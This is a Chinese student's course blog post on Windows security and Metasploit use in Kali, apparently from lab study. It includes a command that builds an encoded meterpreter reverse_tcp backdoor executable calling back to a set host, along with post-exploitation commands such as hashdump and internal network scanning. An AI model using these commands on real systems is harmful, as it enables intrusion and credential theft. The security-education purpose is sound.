zoukankan      html  css  js  c++  java
  • 网络攻防第七次作业

    教材第七章

    Windows操作系统的基本结构

    Windows操作系统内核的基本模块包括如下:Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码、系统支持进程、环境子系统服务进程、服务进程、用户应用软

    件、核心子系统DLL。在上述系统架构下,Windows操作系统内核中实现了如下的核心机制。Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络

    机制。

    Windows操作系统的安全体系结构与机制

    Windows操作系统基于引用监控器模型来实现基本的对象安全模型。Windows的安全机制包括Windows身份认证机制、Windows授权与访问控制价机制、Windows安全审计机制、Windows的其他安全机制。保护

    Windows系统安全稳定运行最为关键的三项安全措施是防火墙、补丁自动更新以及病毒防护。

    Windows系统安全攻防技术

    Windows系统远程安全攻防技术包括远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户。Windows本地安全攻防技术有Windows本地特权提升、Windows敏感信息窃取、Windows消踪灭

    迹、Windows远程控制与后门程序。

    Metasploit使用

    在kali中使用metasploit,需要先开启PostgreSQL数据库鼓舞和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录。命令为service postgresql startservice metasploit start

    kali视频学习

    漏洞利用之Metasploit基础

    Auxiliary:辅助模块

    encoders:供msfencode编码工具使用

    exploits:攻击模块

    payloads:这里面里出的是攻击载荷,也就是攻击成功后执行的代码

    post:后渗透阶段模块,在获得metepreter的shell之后可以使用的攻击代码。

    这是因为kali 2.0已经没有metasploit这个服务了,所以使用命令service metasploit start的方式不起作用。

    在kali 2.0中启动带数据库支持的MSF方式如下:

    首先启动postgresql数据库:/etc/init.d/postgresql start;或者 service postgresql start。初始化MSF数据库(关键步骤!):msfdb init。运行msfconsole:msfconsole。在msf中查看数据库连接状态:

    db_status。运行成功之后截图如下。

    漏洞利用之Meteoreter介绍

    meterpreter是metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,使用它作为攻击载荷能够获得目标系统的一个meterpretershell的链接。

    meterpreter命令由核心命令和扩展库命令组成,可以添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、补货案件信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息。

    常用命令:

    background:将当前会话放置后台

    load/use:加载模块

    Interact:切换进一个信道

    migrate:迁移进程

    run:执行一个已有模块,输入run后按两下tab,会列出所有已有脚本,常用的有autoroute、hashdump、arp_scanner、multi_meter_inject

    Resource:执行一个已有的rc脚本,常用的为payload/windows/meterpreter/reverse_tcp

    生成Meterpreter后门命令:

    msfpayload windows/meterpreter/reverse_tcp LHOST=172.16.69.156 LPORT=2333 R | msfencode -t exe -c 5 > /root.door.exe

    漏洞利用之Metasploit后渗透测试

    1. 查看网卡信息
    2. 添加路由表:run autoroute -s 10.0.0.1
    3. 开socks代理:通过使用 auxiliary/server/socks4a 模块,可以为浏览器,Sqlmap,Nmap等使用
    4. 通过Background和sessions -i可以自由切换进入session
    5. 输入run可以看到在meterpreter上可以做到的很多命令
    6. 通过run post/可以看到后渗透测试的模块
    7. 获取内网信息:run arp_scanner -r 10.0.0.1/24
    8. 上传文件,做端口转发后进行后续测试

    漏洞利用之BeFF

  • 相关阅读:
    P1247 取火柴游戏 (奇异局势)
    1290A
    P1236 算24点
    LCP 4. 覆盖
    leetcode 1066. 校园自行车分配 II
    hdu 2255 奔小康赚大钱
    NC200546 回文串
    上市是什么意思 为什么上市就有钱了
    主板、中小板、创业板、新三板的区别是什么?
    熔断机制
  • 原文地址:https://www.cnblogs.com/wangxinyuan9225/p/10707319.html
Copyright © 2011-2022 走看看